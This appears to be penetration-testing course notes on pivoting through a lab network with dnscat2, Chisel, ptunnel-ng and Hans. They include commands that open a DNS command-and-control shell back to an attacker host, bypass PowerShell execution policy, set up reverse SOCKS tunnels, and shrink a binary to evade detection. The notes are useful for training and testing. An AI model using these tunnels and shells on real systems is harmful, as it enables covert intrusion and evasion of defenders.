Branching Out Our Tunnels
DNS Tunneling with Dnscat2
Dnscat2 is a tunneling tool that uses DNS protocol to send data between two hosts. It uses an encrypted Command-&-Control
(C&C
or C2
) channel and sends data inside TXT records within the DNS protocol.
If dnscat2 is not already set up on our attack host, we can do so using the following commands:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
Starting the dnscat2 server
sudo ruby dnscat2.rb --dns host=<attackerIP>,port=53,domain=inlanefreight.local --no-cache
After running the server, it will provide us the secret key, which we will have to provide to our dnscat2 client on the Windows host so that it can authenticate and encrypt the data that is sent to our external dnscat2 server.
We can use the client with the dnscat2 project or use dnscat2-powershell, a dnscat2 compatible PowerShell-based client that we can run from Windows targets to establish a tunnel with our dnscat2 server
git clone https://github.com/lukebaggett/dnscat2-powershell.git
Once the dnscat2.ps1
file is on the target we can import it and run associated cmd-lets.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <attackerIP> -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
We must use the pre-shared secret (-PreSharedSecret
) generated on the server to ensure our session is established and encrypted. If all steps are completed successfully, we will see a session established with our server.
We can list the options we have with dnscat2 by entering ?
at the prompt.
Listing dnscat2 Options
dnscat2> ?
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
Interacting with the Established Session
window -i 1
SOCKS5 Tunneling with Chisel
Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH.
Chisel
can create a client-server tunnel connection in a firewall restricted environment.
Setting Up & Using Chisel
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
If we want to mind the size of the binary we can follow IppSec's explanation of Chisel, building the binary and shrinking the size of the binary at the 24:29 mark of his video. This is sometimes useful to avoid detection.
Once the binary is built, we can use SCP
to transfer it to the target pivot host.
scp chisel [email protected]:~/
Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5
The Chisel listener will listen for incoming connections on port 1234
using SOCKS5 (--socks5
) and forward it to all the networks that are accessible from the pivot host.
We can start a client on our attack host and connect to the Chisel server.
Connecting to the Chisel Server
./chisel client -v <UbuntuIP>:1234 socks
Now we can modify our proxychains.conf file located at /etc/proxychains.conf
and add 1080
port at the end so we can use proxychains to pivot using the created tunnel between the 1080 port and the SSH tunnel.
[ProxyList]
socks5 127.0.0.1 1080
Now if we use proxychains with RDP, we can connect to the DC on the internal network through the tunnel we have created to the Pivot host.
proxychains xfreerdp /v:<WindowsIP> /u:victor /p:pass@123
Chisel Reverse Pivot
there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option.
We'll start the server in our attack host with the option --reverse
.
Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5
Then we connect from the Ubuntu (pivot host) to our attack host, using the option R:socks
./chisel client -v <attackerIP>:1234 R:socks
Same proxychains config as above
[ProxyList]
socks5 127.0.0.1 1080
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Older versions of pre-compiled Chisel (in case you need old libc)
ICMP Tunneling with SOCKS
ICMP tunneling encapsulates your traffic within ICMP packets
containing echo requests
and responses
. ICMP tunneling would only work when ping responses are permitted within a firewalled network.
We will use the ptunnel-ng tool to create a tunnel between our Ubuntu server and our attack host.
Once a tunnel is created, we will be able to proxy our traffic through the ptunnel-ng client
. We can start the ptunnel-ng server
on the target pivot host. Let's start by setting up ptunnel-ng.
Setting Up & Using ptunnel-ng
If ptunnel-ng is not on our attack host, we can clone the project using git.
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng
sudo ./autogen.sh
Alternative approach of building a static binary
sudo apt install automake autoconf -y
cd ptunnel-ng/
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
./autogen.sh
Transferring Ptunnel-ng to the Pivot Host
scp -r ptunnel-ng ubuntu@<UbuntuIP>:~/
Starting the ptunnel-ng Server on the Pivot Host
sudo ./ptunnel-ng -r<InterfaceIP> -R22
The IP address following -r
should be the IP we want ptunnel-ng to accept connections on
Back on the attack host, we can attempt to connect to the ptunnel-ng server (-p <ipAddressofTarget>
) but ensure this happens through local port 2222 (-l2222
). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel.
sudo ./ptunnel-ng -p<UbuntuIP> -l2222 -r<UbuntuIP> -R22
With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222 (-p2222
).
Tunneling an SSH connection through an ICMP Tunnel
ssh -p 2222 -l ubuntu 127.0.0.1
We may also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various ways.
ssh -D 9050 -p 2222 -l ubuntu 127.0.0.1
We could use proxychains with Nmap to scan targets on the internal network (172.16.5.x). Based on our discoveries, we can attempt to connect to the target.
proxychains nmap -sV -sT <WindowsIP> -p3389
Hans
https://github.com/friedrich/hans
https://github.com/albertzak/hanstunnel
Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests.
./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
./hans -f -c <server_ip> -p P@ssw0rd -v
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
Last updated